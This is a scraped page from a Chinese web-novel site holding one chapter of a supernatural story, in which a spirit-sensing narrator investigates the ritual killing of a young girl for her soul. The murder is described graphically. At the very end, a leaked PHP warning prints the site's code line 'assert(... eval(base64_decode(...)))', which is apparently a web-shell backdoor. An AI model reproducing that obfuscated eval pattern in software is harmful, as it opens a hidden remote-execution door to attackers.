88小说 > 玄幻小说 > 六月千夜 > 第181章 苗苗之死
88小说 www.88xs.org,最快更新六月千夜最新章节!

    ,最快更新六月千夜!

    不过,我倒是意识到了自己可能是真的误会了二虎子的,林正说得多,二虎子看上去也不是真的就是那么的像是一个坏人的,我怎么就会那么的一味的认定二虎子干的就不是好事呢,也许,二虎子真的就是有着苦衷的也说不定。

    这是一个值得深思的问题,但是我也不能刚刚误会了二虎子,转脸就跟二虎子道歉了吧,再说了,我还不知道这究竟是怎么回事呢?

    我只是记得在东京封魔阵的时候,二虎子动了东京封魔阵的什么东西,差点导致了东京封魔阵的结界出现了问题,但是最后结界也没真的出现了什么问题,我一直都觉得那是因为乐乐的原因,但是那不是一道亮光,一道亮光的话,不会看不见的,不至于我的眼睛也会看不见的,我隐约的看见了那道亮光之中还有着什么东西的,就是不知道是什么。

    在东京封魔阵的结界之中,似乎当初根本就不是为了镇压当时在大家横行的各个妖魔鬼怪们,而就是为了地下的这一道结界,这一道结界似乎是守护着什么大门,要不然就是在封锁着什么大门的,不知道钥匙会是什么,但是我知道,那是一个异世界的大门的,不能轻易的打开,否则的话,就一定会出现问题的。

    可是,东京封魔阵的事情,我直到现在还是没彻底的清楚究竟是怎么回事的,只是知道了东京封魔阵和高城家族之间的结界的关系,从而打破了绘美身体里面的封印,救醒了绘美,但是这一切,似乎还只是一个开始,根本就不是一个结束。

    但愿,这一切的事情会有结束的时候,不要在这么没完没了的下去了。

    几天之后,我接到了一个电话,是那天在机场碰见的于大姐打来的,她哭着告诉我说自己家的孩子出了事情,本来是没打算打电话给我的,但是实在是找不到任何人的帮忙了,而且她自己这几天总是感觉自己的孩子一直就在自己的身边,就像是根本就没走似的。

    我也不清楚究竟是发生了什么事情了,就安慰了于大姐一下,就赶紧的出了门去乡下了,于大姐的家里是在乡下的,真的是不太好找,于大姐给了我一个地址,我就带着绘美匆匆忙忙的赶了出去,林正和丁宇哲两个人早晨起来的时候才发现我不在的,打了电话,我着急得很,也就没听见。

    还是绘美给丁宇哲和林正发了一条短信,林正才开着车带着丁宇哲和大人赶紧的追了过来了,我和绘美刚刚坐车到了地方,林正和丁宇哲后脚就追了上来,果然还是开车的比较快,但是到了后面的时候,山路就比较的难走了,乡下的路也根本就过不了车的,车就只能丢在了半路上,随便的找个人看着,就慌里慌张的赶了过去于大姐的家里。

    其实那一次见到了于大姐家里的小孩子的时候,我就知道,这个孩子一定会出事的,是一个难得的灵力很强的孩子,就连我的窥探也能够即刻就察觉出来了,现在这个孩子只是一个未经世事的孩子,还什么都不知道,日后若是能够好好的加以利用的话,一定会很厉害的,至少想要利用这个孩子身上的能力为或一方的话,还是能够做到的。

    我发现了这个孩子身上的特殊之处,那么别人一定也能够发现这个孩子身上特殊的地方的,有心人的话,可能,在发现了之后就会直接的下手了,可是对于我来说,这是一件不能想象的事情,那还只是一个孩子,是一个那么小的孩子,如何能够忍心去伤害。

    走在半路上的时候,我就听见有的村子里的人就在讨论,说什么杨家的孩子,也不知道是得罪了什么人了,之间就给人害死了,爹娘也搬回来了之后就发现自家的孩子已经死在了家里面了,死的方法那叫一个惨啊,是被人倒吊着挂在了房梁上,从脑袋上把全身的血都放干净了才痛苦的死去的,死去的时候,脸上的表情都狰狞的很,脸色都是青黑色的。

    我听得都觉得很可怕,对于一个幼小的孩子做这种惨绝人寰的事情,难道良心上不会过不去吗?我只是想想就觉得恶心得很。

    绘美听了之后,直接就捂着肚子在一边吐了起来,我本来以为只是绘美自己一个人这样的,谁知道回头一看的时候,就连丁宇哲和林正也没比绘美好到了哪里去。

    我到了于大姐家里的时候,家里的孩子还没下葬呢,就摆在家里面,实在是因为死的太惨了,有很多公安局的人都介入调查了,但是我看也没什么用,这群警察都是普通的人,怎么可能查的出来这些的人做的事情呢。

    我也去看了一下这个孩子,孩子的身上贴了一个标签,我这才知道,这个孩子原来叫做苗苗,才是一个不到六岁的孩子,对一个不到六岁的孩子用这种方法杀死,一定是想要做什么事情,而不是只是为了单纯的想要杀死这个孩子,如果是为了出于什么目的的话,也许就是为了这个孩子身上的灵魂了。

    我看了一下苗苗的额头上,果然,天魂已失,其他的两魂也不知道到哪里去了,看来我猜的没错,果然是为了苗苗身上的灵魂去的,这种灵魂对于有些存着歹心的人来说,是最有价值的灵魂。

    “哎哎哎,你在看什么,你知不知道是要保护现场的,这个事受害人,你随随便便的一个人蹦出来就来看尸体干什么,你是不是嫌疑人,就是来破坏现场的!”一个长相凶恶的警察恶狠狠地警告道我。

    “你!”丁宇哲上来就想要和人打起来了。

    林正见势不好,就赶紧上去拉住了丁宇哲,慌忙的从怀里掏出了一张证件,丢给了这个长相不好的警察,“我们也是有关部门的,是中国调查局的,现在怀疑这件事情和恐怖分子,或者是邪教分子的有关,所以我们要介入调查。”

    “早说嘛,有证不拿出来!”这警察十分不高兴的看了一眼证件之后,确定了真伪就丢给了林正。

    “闲杂人等会大老远跑过来吗,即使是不长脑子的人也知道我们是来干什么的!”林正也忍不住的回骂了一句,实在是这个长残了的警察真的是欺人太甚了,说话也忒难听了一点了。

    林正骂了一句之后,状况还好了一点,只是出去封锁现场去了,并没有再过来打扰我们了,于大姐在一边哭得很伤心,我走过去安慰了几句,就不知道该说什么好了。

    于大姐哽咽着问起了我孩子的死究竟是怎么回事,孩子的父亲一个劲的在墙头边上吸着烟,一颗解这一颗的,看见孩子的那副模样,我都觉得自己难以启齿。

    “月姐姐,你过来看一下,这是怎么回事?”林正似乎是在苗苗的身上发现了什么东西,就叫我赶紧的过去看一眼。

    我过去的时候,发现丁宇哲从苗苗的脑袋上面取出了一根很长也很粗的钢针,已经没用了,是用来锁魂的,保证能够将这个孩子全部的意识都带走。

    “月姐姐,你知道这个是用来干什么的吗?”林正疑惑的看着这根钢针问到我。

    “是用来锁魂的,取人灵魂的时候,用这个可以锁住人的三魂不失。”我试着去抹了一下那根钢针,上面已经没有了效用了,说明灵魂早就已经被取走过了,连一丝的痕迹都没有留下,这手法,怎么看着都不像是一场简单地犯罪。

    “真啊!”林正忍不住的感慨了一句。

    “姐姐,这屋子的里里外外也干净得很!”绘美围着这屋子绕了一遍,也没发现有什么不对的地方。

    没什么不对的地方正常,作案结束了,没必要还把线索留给你。

    于大姐说自己一直都觉得苗苗其实就在自己的身边,一到了晚上的时候,苗苗就会过来找自己的,从来都没有离开过自己的身边,苗苗的父亲大声的骂着于大姐,说她是一个神经病,自家的孩子明明就已经死了,早就已经离开了,怎么可能还会回来的!

    母亲爱孩子是天性,舍不得自家的孩子是很正常的事情,而且母亲河孩子,与父亲之于孩子是不一样的,母亲比父亲多了一过程,那就是母亲在怀胎十月的过程,母亲和孩子曾经是同在一个身体里面的,孩子是母亲身上掉下来的一块肉,所以母亲和孩子之间存在着一种特殊的羁绊,如果孩子在的话,母亲一定会有感觉得。

    “于大姐,不介意的话,你能不能让我看一下你的身上?”我赶紧的问到了于大姐。

    于大姐哭着点点头,我就和于大姐走进了里屋里去了,于大姐的身上从上到下都干净得很,什么都没有,但是我在于大姐的身上发现了苗苗的头发,我在这根头发上面感受到了微弱的能量,也许就是因为,这根头发的原因,所以于大姐才会说苗苗一到了晚上的时候就会回来找她的。

    我想,可能是因为人在白天的时候,根本就感受不到微弱的量子能量波动,但是一到了晚上的时候,就能够感觉得到微弱的变化,于大姐本身有很熟悉苗苗的气息,所以于大姐才会感受得到苗苗的存在。

    “于大姐,可能是因为苗苗的头发的问题,所以你才会感觉得到苗苗依然还在你的身边,可能是苗苗死去的时候,觉得太可怕了,太痛苦了,所以就会在极度的恐惧之中在自己的头发上附上了一丝的意识,于是你就会觉得苗苗一直都在你的身边,但是这只是一丝不该留在这个世界上的微弱的能量,并不是真正的苗苗,真正的苗苗已经走了,以后,你应该就不会再有这种感觉了。”我安慰道于大姐。

    于大姐似乎还觉得失望的很,我想可能是因为觉得自己以后都感受不到苗苗的存在了,所以就会觉得很失望,毕竟母亲怀胎十月才能够经历痛苦把孩子生了下来,自己又养了这么多年,怎么可能会舍得自己的孩子这么小就离自己远去呢。

    “于大姐,人都是有旦夕祸福的,生死有命,执着无用,我想以后,你一定还会再有孩子的。”我也只能够这么说了。

    “可是我以后都再也见不到苗苗了吗?”于大姐绝望地拉着我的胳膊,都要给我跪下了,我赶紧的把人扶了起来。

    “于大姐,苗苗已经去了,苗苗的事情,我也觉得很可惜,很痛心,但是苗苗已经不在了,再也不会回来了,但是苗苗的事情,我会尽力的调查清楚的,会给苗苗报仇的,这一点上,你还是可以放心的。”我对于苗苗的死,只能怪表示无能为力了,我唯一能够保证的就是查清楚这件事情,给苗苗报仇了。

    于大姐的眼神之中满是绝望,我想到了曾经的我,对于美子的死,我也是这么的无可奈何,我也没有挽留住美子的离去,如果能够挽留得住生命的话,我一定会挽留得住美子的,可是这世上的任何恩,对于失去的生命都是无可奈何的。

    我出来的时候,于大姐的丈夫满怀希望的看着我,我只能抱歉的对他说:“对不起,我能做的,只是尽力的帮助你们解决苗苗被害的事情,而无法留住苗苗,那只是一丝留在了于大姐身上的苗苗的意识,根本就不是真正的苗苗,真正的苗苗已经去了,我们谁都无法挽留住苗苗的,如果继续的让于大姐这么下去的话,最终,只是对于大姐的身体不好。”

    他最终点点头,沉闷的跟我说:“没关系,我知道,这已经是最好的结果了。”

    苗苗也是他的孩子,他也一定很伤心的吧,只不过他不只是作为一个父亲,也是作为一个丈夫的男人,他绝对不能够倒下的,尤其是在失去了自己的孩子的时候,他可是这个家里的唯一的靠山了。

Warning: assert() [function.assert]: Assertion "$汲箅偬犀= eval(base64_decode($退隉度痣));" failed in /www/wwwroot/www.88xs.org/modules/article/reader.php on line 2